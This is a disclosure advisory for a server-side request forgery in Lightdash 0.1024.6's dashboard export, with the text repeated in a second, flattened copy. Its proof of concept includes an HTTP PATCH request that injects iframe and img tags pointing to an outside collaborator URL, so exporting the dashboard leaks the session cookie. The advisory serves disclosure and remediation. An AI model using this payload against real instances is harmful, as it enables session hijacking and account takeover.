Summary
Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.
Severity
HIGH - Exploitation of this vulnerability could lead to user session compromise and allow a threat actor to take over user sessions. If an administrative user is targeted the threat actor could gain administrative control over the Lightdash instance.
Proof of Concept
Exploitation of this vulnerability requires a threat actor to inject HTML elements into a shared dashboard which point to a threat actor controlled source. Any user who exports the dashboard will leak their session token to the threat actor.
Instance 1: Dashboard Generate Preview
Affected Endpoint (Storage of HTML Injection Payload): PATCH /api/v1/dashboards/<DashboardIdentifier>
Affected Parameters (Storage of HTML Injection Payload): content JSON value
Affected Endpoint (SSRF Execution for Token Leakage): POST /api/v1/dashboards/<DashboardIdentifier>/export
Reproduction Steps:
- Log into the application with a user that has permissions to create a new dashboard
- Create a new markdown dashboard containing HTML injection payloads pointing to Burp Collaborator and save the dashboard
- Click on the “Export Dashboard” menu and click “Generate preview”.
- Wait for the preview to generate and observe a HTTP request to Burp Collaborator which contains the session cookie for the user who initiated the preview generation.
- Share the dashboard with a simulated victim user
- Log into the application as a simulated victim user and recreate the steps to generate a preview of the dashboard
- Wait for the preview to generate and observe that the simulated victim user’s session cookie was exfiltrated to Burp Collaborator.
A request to inject the required HTML elements is shown below.
PATCH /api/v1/dashboards/<DashboardIdentifier> HTTP/2
Host: lightdash-host
...
Priority: u=1, i
Cache-Control: no-transform
{"tiles":[{"uuid":"<UniqueIdentifier>","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"<iframe src=\"<Burp Collaborator URL>\">frame</iframe>\n\n<img src=\"<Burp Collaborator URL>\">img</img>\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}
After injecting a dashboard, exporting it will leak the session token of the exporting user to the injected source. An example HTTP request to export a dashboard is shown below.
POST /api/v1/dashboards/<DashboardIdentifier>/export HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"queryFilters":"","gridWidth":1400}
Further Analysis
A threat actor must be authenticated to the application and possess the necessary permissions to create or edit a shared dashboard and inject a payload. Any user exporting the dashboard will trigger the vulnerability and leak their session token. A threat actor could wait for a user to trigger the SSRF during organic application interaction or force the user to perform the action with cross-site scripting, as described in CVE-2024-6585.
Vendor Analysis
The vendor determined that the root cause of this issue was Puppeteer setting sensitive headers + cookies on requests to headless browser. The issue was remediated in version 0.1027.2
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1027.2
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9295.patch
GitHub Pull Request: lightdash/lightdash#9295
Timeline
Date reported: 03/07/2024
Date fixed: 03/8/2024
Date disclosed: 08/30/2024
kennethchiong Finder
Summary
Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.
Severity
HIGH - Exploitation of this vulnerability could lead to user session compromise and allow a threat actor to take over user sessions. If an administrative user is targeted the threat actor could gain administrative control over the Lightdash instance.
Proof of Concept
Exploitation of this vulnerability requires a threat actor to inject HTML elements into a shared dashboard which point to a threat actor controlled source. Any user who exports the dashboard will leak their session token to the threat actor.
Instance 1: Dashboard Generate Preview
Affected Endpoint (Storage of HTML Injection Payload):
PATCH /api/v1/dashboards/<DashboardIdentifier>Affected Parameters (Storage of HTML Injection Payload):
contentJSON valueAffected Endpoint (SSRF Execution for Token Leakage):
POST /api/v1/dashboards/<DashboardIdentifier>/exportReproduction Steps:
A request to inject the required HTML elements is shown below.
After injecting a dashboard, exporting it will leak the session token of the exporting user to the injected source. An example HTTP request to export a dashboard is shown below.
Further Analysis
A threat actor must be authenticated to the application and possess the necessary permissions to create or edit a shared dashboard and inject a payload. Any user exporting the dashboard will trigger the vulnerability and leak their session token. A threat actor could wait for a user to trigger the SSRF during organic application interaction or force the user to perform the action with cross-site scripting, as described in CVE-2024-6585.
Vendor Analysis
The vendor determined that the root cause of this issue was Puppeteer setting sensitive headers + cookies on requests to headless browser. The issue was remediated in version 0.1027.2
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1027.2
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9295.patch
GitHub Pull Request: lightdash/lightdash#9295
Timeline
Date reported: 03/07/2024
Date fixed: 03/8/2024
Date disclosed: 08/30/2024